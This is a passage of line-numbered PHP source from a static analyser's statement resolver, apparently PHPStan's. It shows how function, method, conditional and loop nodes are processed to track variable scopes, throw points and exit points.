$this->getPhpDocs($scope, $stmt); 409: 410: foreach ($stmt->params as $param) { 411: $this->processParamNode($param, $scope, $nodeCallback); 412: } 413: 414: if ($stmt->returnType !== null) { 415: $nodeCallback($stmt->returnType, $scope); 416: } 417: 418: $functionScope = $scope->enterFunction( 419: $stmt, 420: $templateTypeMap, 421: $phpDocParameterTypes, 422: $phpDocReturnType, 423: $phpDocThrowType, 424: $deprecatedDescription, 425: $isDeprecated, 426: $isInternal, 427: $isFinal, 428: $isPure, 429: $acceptsNamedArguments, 430: ); 431: $functionReflection = $functionScope->getFunction(); 432: if (!$functionReflection instanceof FunctionReflection) { 433: throw new ShouldNotHappenException(); 434: } 435: 436: $nodeCallback(new InFunctionNode($functionReflection, $stmt), $functionScope); 437: 438: $gatheredReturnStatements = []; 439: $executionEnds = []; 440: $statementResult = $this->processStmtNodes($stmt, $stmt->stmts, $functionScope, static function (Node $node, Scope $scope) use ($nodeCallback, $functionScope, &$gatheredReturnStatements, &$executionEnds): void { 441: $nodeCallback($node, $scope); 442: if ($scope->getFunction() !== $functionScope->getFunction()) { 443: return; 444: } 445: if ($scope->isInAnonymousFunction()) { 446: return; 447: } 448: if ($node instanceof ExecutionEndNode) { 449: $executionEnds[] = $node; 450: return; 451: } 452: if (!$node instanceof Return_) { 453: return; 454: } 455: 456: $gatheredReturnStatements[] = new ReturnStatement($scope, $node); 457: }); 458: 459: $nodeCallback(new FunctionReturnStatementsNode( 460: $stmt, 461: $gatheredReturnStatements, 462: $statementResult, 463: $executionEnds, 464: ), $functionScope); 465: } elseif ($stmt instanceof Node\Stmt\ClassMethod) { 466: $hasYield = false; 467: $throwPoints = []; 468: $this->processAttributeGroups($stmt->attrGroups, $scope, $nodeCallback); 469: [$templateTypeMap, $phpDocParameterTypes, $phpDocReturnType, $phpDocThrowType, $deprecatedDescription, $isDeprecated, $isInternal, $isFinal, $isPure, $acceptsNamedArguments] = $this->getPhpDocs($scope, $stmt); 470: 471: foreach ($stmt->params as $param) { 472: $this->processParamNode($param, $scope, $nodeCallback); 473: } 474: 475: if ($stmt->returnType !== null) { 476: $nodeCallback($stmt->returnType, $scope); 477: } 478: 479: $methodScope = $scope->enterClassMethod( 480: $stmt, 481: $templateTypeMap, 482: $phpDocParameterTypes, 483: $phpDocReturnType, 484: $phpDocThrowType, 485: $deprecatedDescription, 486: $isDeprecated, 487: $isInternal, 488: $isFinal, 489: $isPure, 490: $acceptsNamedArguments, 491: ); 492: 493: if ($stmt->name->toLowerString() === '__construct') { 494: foreach ($stmt->params as $param) { 495: if ($param->flags === 0) { 496: continue; 497: } 498: 499: if (!$param->var instanceof Variable || !is_string($param->var->name)) { 500: throw new ShouldNotHappenException(); 501: } 502: $phpDoc = null; 503: if ($param->getDocComment() !== null) { 504: $phpDoc = $param->getDocComment()->getText(); 505: } 506: if (!$scope->isInClass()) { 507: throw new ShouldNotHappenException(); 508: } 509: $nodeCallback(new ClassPropertyNode( 510: $param->var->name, 511: $param->flags, 512: $param->type, 513: null, 514: $phpDoc, 515: true, 516: $param, 517: false, 518: $scope->isInTrait(), 519: $scope->getClassReflection()->isReadOnly(), 520: ), $methodScope); 521: } 522: } 523: 524: if ($stmt->getAttribute('virtual', false) === false) { 525: $methodReflection = $methodScope->getFunction(); 526: if (!$methodReflection instanceof MethodReflection) { 527: throw new ShouldNotHappenException(); 528: } 529: $nodeCallback(new InClassMethodNode($methodReflection, $stmt), $methodScope); 530: } 531: 532: if ($stmt->stmts !== null) { 533: $gatheredReturnStatements = []; 534: $executionEnds = []; 535: $statementResult = $this->processStmtNodes($stmt, $stmt->stmts, $methodScope, static function (Node $node, Scope $scope) use ($nodeCallback, $methodScope, &$gatheredReturnStatements, &$executionEnds): void { 536: $nodeCallback($node, $scope); 537: if ($scope->getFunction() !== $methodScope->getFunction()) { 538: return; 539: } 540: if ($scope->isInAnonymousFunction()) { 541: return; 542: } 543: if ($node instanceof ExecutionEndNode) { 544: $executionEnds[] = $node; 545: return; 546: } 547: if (!$node instanceof Return_) { 548: return; 549: } 550: 551: $gatheredReturnStatements[] = new ReturnStatement($scope, $node); 552: }); 553: $nodeCallback(new MethodReturnStatementsNode( 554: $stmt, 555: $gatheredReturnStatements, 556: $statementResult, 557: $executionEnds, 558: ), $methodScope); 559: } 560: } elseif ($stmt instanceof Echo_) { 561: $hasYield = false; 562: $throwPoints = []; 563: foreach ($stmt->exprs as $echoExpr) { 564: $result = $this->processExprNode($echoExpr, $scope, $nodeCallback, ExpressionContext::createDeep()); 565: $throwPoints = array_merge($throwPoints, $result->getThrowPoints()); 566: $scope = $result->getScope(); 567: $hasYield = $hasYield || $result->hasYield(); 568: } 569: 570: $throwPoints = $overridingThrowPoints ?? $throwPoints; 571: } elseif ($stmt instanceof Return_) { 572: if ($stmt->expr !== null) { 573: $result = $this->processExprNode($stmt->expr, $scope, $nodeCallback, ExpressionContext::createDeep()); 574: $throwPoints = $result->getThrowPoints(); 575: $scope = $result->getScope(); 576: $hasYield = $result->hasYield(); 577: } else { 578: $hasYield = false; 579: $throwPoints = []; 580: } 581: 582: return new StatementResult($scope, $hasYield, true, [ 583: new StatementExitPoint($stmt, $scope), 584: ], $overridingThrowPoints ?? $throwPoints); 585: } elseif ($stmt instanceof Continue_ || $stmt instanceof Break_) { 586: if ($stmt->num !== null) { 587: $result = $this->processExprNode($stmt->num, $scope, $nodeCallback, ExpressionContext::createDeep()); 588: $scope = $result->getScope(); 589: $hasYield = $result->hasYield(); 590: $throwPoints = $result->getThrowPoints(); 591: } else { 592: $hasYield = false; 593: $throwPoints = []; 594: } 595: 596: return new StatementResult($scope, $hasYield, true, [ 597: new StatementExitPoint($stmt, $scope), 598: ], $overridingThrowPoints ?? $throwPoints); 599: } elseif ($stmt instanceof Node\Stmt\Expression) { 600: $earlyTerminationExpr = $this->findEarlyTerminatingExpr($stmt->expr, $scope); 601: $result = $this->processExprNode($stmt->expr, $scope, $nodeCallback, ExpressionContext::createTopLevel()); 602: $scope = $result->getScope(); 603: $scope = $scope->filterBySpecifiedTypes($this->typeSpecifier->specifyTypesInCondition( 604: $scope, 605: $stmt->expr, 606: TypeSpecifierContext::createNull(), 607: )); 608: $hasYield = $result->hasYield(); 609: $throwPoints = $result->getThrowPoints(); 610: if ($earlyTerminationExpr !== null) { 611: return new StatementResult($scope, $hasYield, true, [ 612: new StatementExitPoint($stmt, $scope), 613: ], $overridingThrowPoints ?? $throwPoints); 614: } 615: return new StatementResult($scope, $hasYield, false, [], $overridingThrowPoints ?? $throwPoints); 616: } elseif ($stmt instanceof Node\Stmt\Namespace_) { 617: if ($stmt->name !== null) { 618: $scope = $scope->enterNamespace($stmt->name->toString()); 619: } 620: 621: $scope = $this->processStmtNodes($stmt, $stmt->stmts, $scope, $nodeCallback)->getScope(); 622: $hasYield = false; 623: $throwPoints = []; 624: } elseif ($stmt instanceof Node\Stmt\Trait_) { 625: return new StatementResult($scope, false, false, [], []); 626: } elseif ($stmt instanceof Node\Stmt\ClassLike) { 627: $hasYield = false; 628: $throwPoints = []; 629: if (isset($stmt->namespacedName)) { 630: $classReflection = $this->getCurrentClassReflection($stmt, $stmt->namespacedName->toString(), $scope); 631: $classScope = $scope->enterClass($classReflection); 632: $nodeCallback(new InClassNode($stmt, $classReflection), $classScope); 633: } elseif ($stmt instanceof Class_) { 634: if ($stmt->name === null) { 635: throw new ShouldNotHappenException(); 636: } 637: if ($stmt->getAttribute('anonymousClass', false) === false) { 638: $classReflection = $this->reflectionProvider->getClass($stmt->name->toString()); 639: } else { 640: $classReflection = $this->reflectionProvider->getAnonymousClassReflection($stmt, $scope); 641: } 642: $classScope = $scope->enterClass($classReflection); 643: $nodeCallback(new InClassNode($stmt, $classReflection), $classScope); 644: } else { 645: throw new ShouldNotHappenException(); 646: } 647: 648: $classStatementsGatherer = new ClassStatementsGatherer($classReflection, $nodeCallback); 649: $this->processAttributeGroups($stmt->attrGroups, $classScope, $classStatementsGatherer); 650: 651: $this->processStmtNodes($stmt, $stmt->stmts, $classScope, $classStatementsGatherer); 652: $nodeCallback(new ClassPropertiesNode($stmt, $this->readWritePropertiesExtensionProvider, $classStatementsGatherer->getProperties(), $classStatementsGatherer->getPropertyUsages(), $classStatementsGatherer->getMethodCalls()), $classScope); 653: $nodeCallback(new ClassMethodsNode($stmt, $classStatementsGatherer->getMethods(), $classStatementsGatherer->getMethodCalls()), $classScope); 654: $nodeCallback(new ClassConstantsNode($stmt, $classStatementsGatherer->getConstants(), $classStatementsGatherer->getConstantFetches()), $classScope); 655: $classReflection->evictPrivateSymbols(); 656: } elseif ($stmt instanceof Node\Stmt\Property) { 657: $hasYield = false; 658: $throwPoints = []; 659: $this->processAttributeGroups($stmt->attrGroups, $scope, $nodeCallback); 660: 661: foreach ($stmt->props as $prop) { 662: $this->processStmtNode($prop, $scope, $nodeCallback); 663: [,,,,,,,,,,$isReadOnly, $docComment] = $this->getPhpDocs($scope, $stmt); 664: if (!$scope->isInClass()) { 665: throw new ShouldNotHappenException(); 666: } 667: $nodeCallback( 668: new ClassPropertyNode( 669: $prop->name->toString(), 670: $stmt->flags, 671: $stmt->type, 672: $prop->default, 673: $docComment, 674: false, 675: $prop, 676: $isReadOnly, 677: $scope->isInTrait(), 678: $scope->getClassReflection()->isReadOnly(), 679: ), 680: $scope, 681: ); 682: } 683: 684: if ($stmt->type !== null) { 685: $nodeCallback($stmt->type, $scope); 686: } 687: } elseif ($stmt instanceof Node\Stmt\PropertyProperty) { 688: $hasYield = false; 689: $throwPoints = []; 690: if ($stmt->default !== null) { 691: $this->processExprNode($stmt->default, $scope, $nodeCallback, ExpressionContext::createDeep()); 692: } 693: } elseif ($stmt instanceof Throw_) { 694: $result = $this->processExprNode($stmt->expr, $scope, $nodeCallback, ExpressionContext::createDeep()); 695: $throwPoints = $result->getThrowPoints(); 696: $throwPoints[] = ThrowPoint::createExplicit($result->getScope(), $scope->getType($stmt->expr), $stmt, false); 697: return new StatementResult($result->getScope(), $result->hasYield(), true, [ 698: new StatementExitPoint($stmt, $scope), 699: ], $throwPoints); 700: } elseif ($stmt instanceof If_) { 701: $conditionType = $scope->getType($stmt->cond)->toBoolean(); 702: $ifAlwaysTrue = $conditionType instanceof ConstantBooleanType && $conditionType->getValue(); 703: $condResult = $this->processExprNode($stmt->cond, $scope, $nodeCallback, ExpressionContext::createDeep()); 704: $exitPoints = []; 705: $throwPoints = $overridingThrowPoints ?? $condResult->getThrowPoints(); 706: $finalScope = null; 707: $alwaysTerminating = true; 708: $hasYield = $condResult->hasYield(); 709: 710: $branchScopeStatementResult = $this->processStmtNodes($stmt, $stmt->stmts, $condResult->getTruthyScope(), $nodeCallback); 711: 712: if (!$conditionType instanceof ConstantBooleanType || $conditionType->getValue()) { 713: $exitPoints = $branchScopeStatementResult->getExitPoints(); 714: $throwPoints = array_merge($throwPoints, $branchScopeStatementResult->getThrowPoints()); 715: $branchScope = $branchScopeStatementResult->getScope(); 716: $finalScope = $branchScopeStatementResult->isAlwaysTerminating() ? null : $branchScope; 717: $alwaysTerminating = $branchScopeStatementResult->isAlwaysTerminating(); 718: $hasYield = $branchScopeStatementResult->hasYield() || $hasYield; 719: } 720: 721: $scope = $condResult->getFalseyScope(); 722: $lastElseIfConditionIsTrue = false; 723: 724: $condScope = $scope; 725: foreach ($stmt->elseifs as $elseif) { 726: $nodeCallback($elseif, $scope); 727: $elseIfConditionType = $condScope->getType($elseif->cond)->toBoolean(); 728: $condResult = $this->processExprNode($elseif->cond, $condScope, $nodeCallback, ExpressionContext::createDeep()); 729: $throwPoints = array_merge($throwPoints, $condResult->getThrowPoints()); 730: $condScope = $condResult->getScope(); 731: $branchScopeStatementResult = $this->processStmtNodes($elseif, $elseif->stmts, $condResult->getTruthyScope(), $nodeCallback); 732: 733: if ( 734: !$ifAlwaysTrue 735: && ( 736: !$lastElseIfConditionIsTrue 737: && ( 738: !$elseIfConditionType instanceof ConstantBooleanType 739: || $elseIfConditionType->getValue() 740: ) 741: ) 742: ) { 743: $exitPoints = array_merge($exitPoints, $branchScopeStatementResult->getExitPoints()); 744: $throwPoints = array_merge($throwPoints, $branchScopeStatementResult->getThrowPoints()); 745: $branchScope = $branchScopeStatementResult->getScope(); 746: $finalScope = $branchScopeStatementResult->isAlwaysTerminating() ? $finalScope : $branchScope->mergeWith($finalScope); 747: $alwaysTerminating = $alwaysTerminating && $branchScopeStatementResult->isAlwaysTerminating(); 748: $hasYield = $hasYield || $branchScopeStatementResult->hasYield(); 749: } 750: 751: if ( 752: $elseIfConditionType instanceof ConstantBooleanType 753: && $elseIfConditionType->getValue() 754: ) { 755: $lastElseIfConditionIsTrue = true; 756: } 757: 758: $condScope = $condScope->filterByFalseyValue($elseif->cond); 759: $scope = $condScope; 760: } 761: 762: if ($stmt->else === null) { 763: if (!$ifAlwaysTrue) { 764: $finalScope = $scope->mergeWith($finalScope); 765: $alwaysTerminating = false; 766: } 767: } else { 768: $nodeCallback($stmt->else, $scope); 769: $branchScopeStatementResult = $this->processStmtNodes($stmt->else, $stmt->else->stmts, $scope, $nodeCallback); 770: 771: if (!$ifAlwaysTrue && !$lastElseIfConditionIsTrue) { 772: $exitPoints = array_merge($exitPoints, $branchScopeStatementResult->getExitPoints()); 773: $throwPoints = array_merge($throwPoints, $branchScopeStatementResult->getThrowPoints()); 774: $branchScope = $branchScopeStatementResult->getScope(); 775: $finalScope = $branchScopeStatementResult->isAlwaysTerminating() ? $finalScope : $branchScope->mergeWith($finalScope); 776: $alwaysTerminating = $alwaysTerminating && $branchScopeStatementResult->isAlwaysTerminating(); 777: $hasYield = $hasYield || $branchScopeStatementResult->hasYield(); 778: } 779: } 780: 781: if ($finalScope === null) { 782: $finalScope = $scope; 783: } 784: 785: return new StatementResult($finalScope, $hasYield, $alwaysTerminating, $exitPoints, $throwPoints); 786: } elseif ($stmt instanceof Node\Stmt\TraitUse) { 787: $hasYield = false; 788: $throwPoints = []; 789: $this->processTraitUse($stmt, $scope, $nodeCallback); 790: } elseif ($stmt instanceof Foreach_) { 791: $condResult = $this->processExprNode($stmt->expr, $scope, $nodeCallback, ExpressionContext::createDeep()); 792: $throwPoints = $overridingThrowPoints ?? $condResult->getThrowPoints(); 793: $scope = $condResult->getScope(); 794: $arrayComparisonExpr = new BinaryOp\NotIdentical( 795: $stmt->expr, 796: new Array_([]), 797: ); 798: $inForeachScope = $scope; 799: if ($stmt->expr instanceof Variable && is_string($stmt->expr->name)) { 800: $inForeachScope = $this->processVarAnnotation($scope, [$stmt->expr->name], $stmt); 801: } 802: $nodeCallback(new InForeachNode($stmt), $inForeachScope); 803: $bodyScope = $this->enterForeach($scope->filterByTruthyValue($arrayComparisonExpr), $stmt); 804: $count = 0; 805: do { 806: $prevScope = $bodyScope; 807: $bodyScope = $bodyScope->mergeWith($scope->filterByTruthyValue($arrayComparisonExpr)); 808: $bodyScope = $this->enterForeach($bodyScope, $stmt); 809: $bodyScopeResult = $this->processStmtNodes($stmt, $stmt->stmts, $bodyScope, static function (): void { 810: })->filterOutLoopExitPoints(); 811: $alwaysTerminating = $bodyScopeResult->isAlwaysTerminating(); 812: $bodyScope = $bodyScopeResult->getScope(); 813: foreach ($bodyScopeResult->getExitPointsByType(Continue_::class) as $continueExitPoint) { 814: $bodyScope = $bodyScope->mergeWith($continueExitPoint->getScope()); 815: } 816: if ($bodyScope->equals($prevScope)) { 817: break; 818: } 819: 820: if ($count >= self::GENERALIZE_AFTER_ITERATION) { 821: $bodyScope = $prevScope->generalizeWith($bodyScope); 822: } 823: $count++; 824: } while (!$alwaysTerminating && $count < self::LOOP_SCOPE_ITERATIONS); 825: 826: $bodyScope = $bodyScope->mergeWith($scope->filterByTruthyValue($arrayComparisonExpr)); 827: $bodyScope = $this->enterForeach($bodyScope, $stmt); 828: $finalScopeResult = $this->processStmtNodes($stmt, $stmt->stmts, $bodyScope, $nodeCallback)->filterOutLoopExitPoints(); 829: $finalScope = $finalScopeResult->getScope(); 830: foreach ($finalScopeResult->getExitPointsByType(Continue_::class) as $continueExitPoint) { 831: $finalScope = $continueExitPoint->getScope()->mergeWith($finalScope); 832: } 833: foreach ($finalScopeResult->getExitPointsByType(Break_::class) as $breakExitPoint) { 834: $finalScope = $breakExitPoint->getScope()->mergeWith($finalScope); 835: } 836: 837: $isIterableAtLeastOnce = $scope->getType($stmt->expr)->isIterableAtLeastOnce(); 838: if ($isIterableAtLeastOnce->no() || $finalScopeResult->isAlwaysTerminating()) { 839: $finalScope = $scope; 840: } elseif ($isIterableAtLeastOnce->maybe()) { 841: if ($this->polluteScopeWithAlwaysIterableForeach) { 842: $finalScope = $finalScope->mergeWith($scope->filterByFalseyValue($arrayComparisonExpr)); 843: } else { 844: $finalScope = $finalScope->mergeWith($scope); 845: } 846: } elseif (!$this->polluteScopeWithAlwaysIterableForeach) { 847: $finalScope = $scope->processAlwaysIterableForeachScopeWithoutPollute($finalScope); 848: // get types from finalScope, but don't create new variables 849: } 850: 851: if (!$isIterableAtLeastOnce->no()) { 852: $throwPoints = array_merge($throwPoints, $finalScopeResult->getThrowPoints()); 853: } 854: if (!(new ObjectType(Traversable::class))->isSuperTypeOf($scope->getType($stmt->expr))->no()) { 855: $throwPoints[] = ThrowPoint::createImplicit($scope, $stmt->expr); 856: } 857: 858: return new StatementResult( 859: $finalScope, 860: $finalScopeResult->hasYield() || $condResult->hasYield(), 861: $isIterableAtLeastOnce->yes() && $finalScopeResult->isAlwaysTerminating(), 862: $finalScopeResult->getExitPointsForOuterLoop(), 863: $throwPoints, 864: ); 865: } elseif ($stmt instanceof While_) { 866: $condResult = $this->processExprNode($stmt->cond, $scope, static function (): void { 867: }, ExpressionContext::createDeep()); 868: $bodyScope = $condResult->getTruthyScope(); 869: $count = 0; 870: do { 871: $prevScope = $bodyScope; 872: $bodyScope = $bodyScope->mergeWith($scope); 873: $bodyScope = $this->processExprNode($stmt->cond, $bodyScope, static function (): void { 874: }, ExpressionContext::createDeep())->getTruthyScope(); 875: $bodyScopeResult = $this->processStmtNodes($stmt, $stmt->stmts, $bodyScope, static function (): void { 876: })->filterOutLoopExitPoints(); 877: $alwaysTerminating = $bodyScopeResult->isAlwaysTerminating(); 878: $bodyScope = $bodyScopeResult->getScope(); 879: foreach ($bodyScopeResult->getExitPointsByType(Continue_::class) as $continueExitPoint) { 880: $bodyScope = $bodyScope->mergeWith($continueExitPoint->getScope()); 881: } 882: if ($bodyScope->equals($prevScope)) { 883: break; 884: } 885: 886: if ($count >= self::GENERALIZE_AFTER_ITERATION) { 887: $bodyScope = $prevScope->generalizeWith($bodyScope); 888: } 889: $count++; 890: } while (!$alwaysTerminating && $count < self::LOOP_SCOPE_ITERATIONS); 891: 892: $bodyScope = $bodyScope->mergeWith($scope); 893: $bodyScopeMaybeRan = $bodyScope; 894: $bodyScope = $this->processExprNode($stmt->cond, $bodyScope, $nodeCallback, ExpressionContext::createDeep())->getTruthyScope(); 895: $finalScopeResult = $this->processStmtNodes($stmt, $stmt->stmts, $bodyScope, $nodeCallback)->filterOutLoopExitPoints(); 896: $finalScope = $finalScopeResult->getScope()->filterByFalseyValue($stmt->cond); 897: foreach ($finalScopeResult->getExitPointsByType(Continue_::class) as $continueExitPoint) { 898: $finalScope = $finalScope->mergeWith($continueExitPoint->getScope()); 899: } 900: $breakExitPoints = $finalScopeResult->getExitPointsByType(Break_::class); 901: foreach ($breakExitPoints as $breakExitPoint) { 902: $finalScope = $finalScope->mergeWith($breakExitPoint->getScope()); 903: } 904: 905: $beforeCondBooleanType = $scope->getType($stmt->cond)->toBoolean(); 906: $condBooleanType = $bodyScopeMaybeRan->getType($stmt->cond)->toBoolean(); 907: $isIterableAtLeastOnce = $beforeCondBooleanType instanceof ConstantBooleanType && $beforeCondBooleanType->getValue(); 908: $alwaysIterates = $condBooleanType instanceof ConstantBooleanType && $condBooleanType->getValue(); 909: $neverIterates = $condBooleanType instanceof ConstantBooleanType && !$condBooleanType->getValue(); 910: $nodeCallback(new BreaklessWhileLoopNode($stmt, $finalScopeResult->getExitPoints()), $bodyScopeMaybeRan); 911: 912: if ($alwaysIterates) { 913: $isAlwaysTerminating = count($finalScopeResult->getExitPointsByType(Break_::class)) === 0; 914: } elseif ($isIterableAtLeastOnce) { 915: $isAlwaysTerminating = $finalScopeResult->isAlwaysTerminating(); 916: } else { 917: $isAlwaysTerminating = false; 918: } 919: $condScope = $condResult->getFalseyScope(); 920: if (!$isIterableAtLeastOnce) { 921: if (!$this->polluteScopeWithLoopInitialAssignments) { 922: $condScope = $condScope->mergeWith($scope); 923: } 924: $finalScope = $finalScope->mergeWith($condScope); 925: } 926: 927: $throwPoints = $overridingThrowPoints ?? $condResult->getThrowPoints(); 928: if (!$neverIterates) { 929: $throwPoints = array_merge($throwPoints, $finalScopeResult->getThrowPoints()); 930: } 931: 932: return new StatementResult( 933: $finalScope, 934: $finalScopeResult->hasYield() || $condResult->hasYield(), 935: $isAlwaysTerminating, 936: $finalScopeResult->getExitPointsForOuterLoop(), 937: $throwPoints, 938: ); 939: } elseif ($stmt instanceof Do_) { 940: $finalScope = null; 941: $bodyScope = $scope; 942: $count = 0; 943: $hasYield = false; 944: $throwPoints = []; 945: 946: do { 947: $prevScope = $bodyScope; 948: $bodyScopeResult = $this->processStmtNodes($stmt, $stmt->stmts, $bodyScope, static function (): void { 949: })->filterOutLoopExitPoints(); 950: $alwaysTerminating = $bodyScopeResult->isAlwaysTerminating(); 951: $bodyScope = $bodyScopeResult->getScope(); 952: foreach ($bodyScopeResult->getExitPointsByType(Continue_::class) as $continueExitPoint) { 953: $bodyScope = $bodyScope->mergeWith($continueExitPoint->getScope()); 954: } 955: $finalScope = $alwaysTerminating ? $finalScope : $bodyScope->mergeWith($finalScope); 956: foreach ($bodyScopeResult->getExitPointsByType(Break_::class) as $breakExitPoint) { 957: $finalScope = $breakExitPoint->getScope()->mergeWith($finalScope); 958: } 959: $bodyScope = $this->processExprNode($stmt->cond, $bodyScope, static function (): void { 960: }, ExpressionContext::createDeep())->getTruthyScope(); 961: if ($bodyScope->equals($prevScope)) { 962: break; 963: } 964: 965: if ($count >= self::GENERALIZE_AFTER_ITERATION) { 966: $bodyScope = $prevScope->generalizeWith($bodyScope); 967: } 968: $count++; 969: } while (!$alwaysTerminating && $count < self::LOOP_SCOPE_ITERATIONS); 970: 971: $bodyScope = $bodyScope->mergeWith($scope); 972: 973: $bodyScopeResult = $this->processStmtNodes($stmt, $stmt->stmts, $bodyScope, $nodeCallback)->filterOutLoopExitPoints(); 974: $bodyScope = $bodyScopeResult->getScope(); 975: foreach ($bodyScopeResult->getExitPointsByType(Continue_::class) as $continueExitPoint) { 976: $bodyScope = $bodyScope->mergeWith($continueExitPoint->getScope()); 977: } 978: $condBooleanType = $bodyScope->getType($stmt->cond)->toBoolean(); 979: $alwaysIterates = $condBooleanType instanceof ConstantBooleanType && $condBooleanType->getValue(); 980: 981: $nodeCallback(new DoWhileLoopConditionNode($stmt->cond, $bodyScopeResult->getExitPoints()), $bodyScope); 982: 983: if ($alwaysIterates) { 984: $alwaysTerminating = count($bodyScopeResult->getExitPointsByType(Break_::class)) === 0; 985: } else { 986: $alwaysTerminating = $bodyScopeResult->isAlwaysTerminating(); 987: } 988: $finalScope = $alwaysTerminating ? $finalScope : $bodyScope->mergeWith($finalScope); 989: if ($finalScope === null) { 990: $finalScope = $scope; 991: } 992: if (!$alwaysTerminating) { 993: $condResult = $this->processExprNode($stmt->cond, $bodyScope, $nodeCallback, ExpressionContext::createDeep()); 994: $hasYield = $condResult->hasYield(); 995: $throwPoints = $condResult->getThrowPoints(); 996: $finalScope = $condResult->getFalseyScope(); 997: } else { 998: $this->processExprNode($stmt->cond, $bodyScope, $nodeCallback, ExpressionContext::createDeep()); 999: } 1000: foreach ($bodyScopeResult->getExitPointsByType(Break_::class) as $breakExitPoint) { 1001: $finalScope = $breakExitPoint->getScope()->mergeWith($finalScope); 1002: } 1003: 1004: return new StatementResult( 1005: $finalScope, 1006: $bodyScopeResult->hasYield() || $hasYield, 1007: $alwaysTerminating, 1008: $bodyScopeResult->getExitPointsForOuterLoop(), 1009: array_merge($throwPoints, $bodyScopeResult->getThrowPoints()), 1010: ); 1011: } elseif ($stmt instanceof For_) { 1012: $initScope = $scope; 1013: $hasYield = false; 1014: $throwPoints = []; 1015: foreach ($stmt->init as $initExpr) { 1016: $initResult = $this->processExprNode($initExpr, $initScope, $nodeCallback, ExpressionContext::createTopLevel()); 1017: $initScope = $initResult->getScope(); 1018: $hasYield = $hasYield || $initResult->hasYield(); 1019: $throwPoints = array_merge($throwPoints, $initResult->getThrowPoints()); 1020: } 1021: 1022: $bodyScope = $initScope; 1023: $isIterableAtLeastOnce = TrinaryLogic::createYes(); 1024: foreach ($stmt->cond as $condExpr) { 1025: $condResult = $this->processExprNode($condExpr, $bodyScope, static function (): void { 1026: }, ExpressionContext::createDeep()); 1027: $initScope = $condResult->getScope(); 1028: $condTruthiness = $condResult->getScope()->getType($condExpr)->toBoolean(); 1029: if ($condTruthiness instanceof ConstantBooleanType) { 1030: $condTruthinessTrinary = TrinaryLogic::createFromBoolean($condTruthiness->getValue()); 1031: } else { 1032: $condTruthinessTrinary = TrinaryLogic::createMaybe(); 1033: } 1034: $isIterableAtLeastOnce = $isIterableAtLeastOnce->and($condTruthinessTrinary); 1035: $hasYield = $hasYield || $condResult->hasYield(); 1036: $throwPoints = array_merge($throwPoints, $condResult->getThrowPoints()); 1037: $bodyScope = $condResult->getTruthyScope(); 1038: } 1039: 1040: $count = 0; 1041: do { 1042: $prevScope = $bodyScope; 1043: $bodyScope = $bodyScope->mergeWith($initScope); 1044: foreach ($stmt->cond as $condExpr) { 1045: $bodyScope = $this->processExprNode($condExpr, $bodyScope, static function (): void { 1046: }, ExpressionContext::createDeep())->getTruthyScope(); 1047: } 1048: $bodyScopeResult = $this->processStmtNodes($stmt, $stmt->stmts, $bodyScope, static function (): void { 1049: })->filterOutLoopExitPoints(); 1050: $alwaysTerminating = $bodyScopeResult->isAlwaysTerminating(); 1051: $bodyScope = $bodyScopeResult->getScope(); 1052: foreach ($bodyScopeResult->getExitPointsByType(Continue_::class) as $continueExitPoint) { 1053: $bodyScope = $bodyScope->mergeWith($continueExitPoint->getScope()); 1054: } 1055: foreach ($stmt->loop as $loopExpr) { 1056: $exprResult = $this->processExprNode($loopExpr, $bodyScope, static function (): void { 1057: }, ExpressionContext::createTopLevel()); 1058: $bodyScope = $exprResult->getScope(); 1059: $hasYield = $hasYield || $exprResult->hasYield(); 1060: $throwPoints = array_merge($throwPoints, $exprResult->getThrowPoints()); 1061: } 1062: 1063: if ($bodyScope->equals($prevScope)) { 1064: break; 1065: } 1066: 1067: if ($count >= self::GENERALIZE_AFTER_ITERATION) { 1068: $bodyScope = $prevScope->generalizeWith($bodyScope); 1069: } 1070: $count++; 1071: } while (!$alwaysTerminating && $count < self::LOOP_SCOPE_ITERATIONS); 1072: 1073: $bodyScope = $bodyScope->mergeWith($initScope); 1074: foreach ($stmt->cond as $condExpr) { 1075: $bodyScope = $this->processExprNode($condExpr, $bodyScope, $nodeCallback, ExpressionContext::createDeep())->getTruthyScope(); 1076: } 1077: 1078: $finalScopeResult = $this->processStmtNodes($stmt, $stmt->stmts, $bodyScope, $nodeCallback)->filterOutLoopExitPoints(); 1079: $finalScope = $finalScopeResult->getScope(); 1080: foreach ($finalScopeResult->getExitPointsByType(Continue_::class) as $continueExitPoint) { 1081: $finalScope = $continueExitPoint->getScope()->mergeWith($finalScope); 1082: } 1083: 1084: $loopScope = $finalScope; 1085: foreach ($stmt->loop as $loopExpr) { 1086: $loopScope = $this->processExprNode($loopExpr, $loopScope, $nodeCallback, ExpressionContext::createTopLevel())->getScope(); 1087: } 1088: $finalScope = $finalScope->generalizeWith($loopScope); 1089: foreach ($stmt->cond as $condExpr) { 1090: $finalScope = $finalScope->filterByFalseyValue($condExpr); 1091: } 1092: 1093: foreach ($finalScopeResult->getExitPointsByType(Break_::class) as $breakExitPoint) { 1094: $finalScope = $breakExitPoint->getScope()->mergeWith($finalScope); 1095: } 1096: 1097: if ($isIterableAtLeastOnce->no() || $finalScopeResult->isAlwaysTerminating()) { 1098: if ($this->polluteScopeWithLoopInitialAssignments) { 1099: $finalScope = $initScope; 1100: } else { 1101: $finalScope = $scope; 1102: } 1103: 1104: } elseif ($isIterableAtLeastOnce->maybe()) { 1105: if ($this->polluteScopeWithLoopInitialAssignments) { 1106: $finalScope = $finalScope->mergeWith($initScope); 1107: } else { 1108: $finalScope = $finalScope->mergeWith($scope); 1109: } 1110: } else { 1111: if (!$this->polluteScopeWithLoopInitialAssignments) { 1112: $finalScope = $finalScope->mergeWith($scope); 1113: } 1114: } 1115: 1116: return new StatementResult( 1117: $finalScope, 1118: $finalScopeResult->hasYield() || $hasYield, 1119: false/* $finalScopeResult->isAlwaysTerminating() && $isAlwaysIterable*/, 1120: $finalScopeResult->getExitPointsForOuterLoop(), 1121: array_merge($throwPoints, $finalScopeResult->getThrowPoints()), 1122: ); 1123: } elseif ($stmt instanceof Switch_) { 1124: $condResult = $this->processExprNode($stmt->cond, $scope, $nodeCallback, ExpressionContext::createDeep()); 1125: $scope = $condResult->getScope(); 1126: $scopeForBranches = $scope; 1127: $finalScope = null; 1128: $prevScope = null; 1129: $hasDefaultCase = false; 1130: $alwaysTerminating = true; 1131: $hasYield = $condResult->hasYield(); 1132: $exitPointsForOuterLoop = []; 1133: $throwPoints = $condResult->getThrowPoints(); 1134: foreach ($stmt->cases as $caseNode) { 1135: if ($caseNode->cond !== null) { 1136: $condExpr = new BinaryOp\Equal($stmt->cond, $caseNode->cond); 1137: $caseResult = $this->processExprNode($caseNode->cond, 